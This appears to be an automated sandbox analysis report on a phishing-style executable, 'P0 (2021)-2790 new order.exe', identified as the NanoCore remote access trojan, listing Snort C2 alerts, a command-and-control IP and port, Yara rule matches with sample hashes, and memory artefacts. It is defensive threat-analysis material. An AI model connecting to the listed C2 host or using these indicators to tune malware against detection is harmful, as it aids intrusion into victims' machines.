Source:	Binary string: C:\Windows\dll\System.pdbSy source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.pdb source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb F source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.2.dr
Source:	Binary string: System.pdb source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdbse source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49735 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49736 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49737 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49742 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49745 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49746 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49747 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49754 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49774 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49775 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49779 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49786 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49787 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49788 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49789 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49790 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49795 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49796 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49797 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49798 -> 185.140.53.8:8907
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49799 -> 185.140.53.8:8907

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: 185.140.53.8

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: Joe Sandbox View

IP Address: 185.140.53.8 185.140.53.8

Source: global traffic

TCP traffic: 192.168.2.3:49735 -> 185.140.53.8:8907

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49679

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.8

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Code function: 2_2_052E2E76 WSARecv,

2_2_052E2E76

Source: dhcpmon.exe, 0000000C.00000002.233523050.0000000000798000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: MSBuild.exe, 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.30812fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.MSBuild.exe.5a20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: P0 (2021)-2790 new order.exe

Source: P0 (2021)-2790 new order.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.30812fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.30812fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.MSBuild.exe.5a20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.5a20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3340B	0_2_00A3340B
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A42C51	0_2_00A42C51
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A431C3	0_2_00A431C3
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A47134	0_2_00A47134
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A3C11C	0_2_00A3C11C
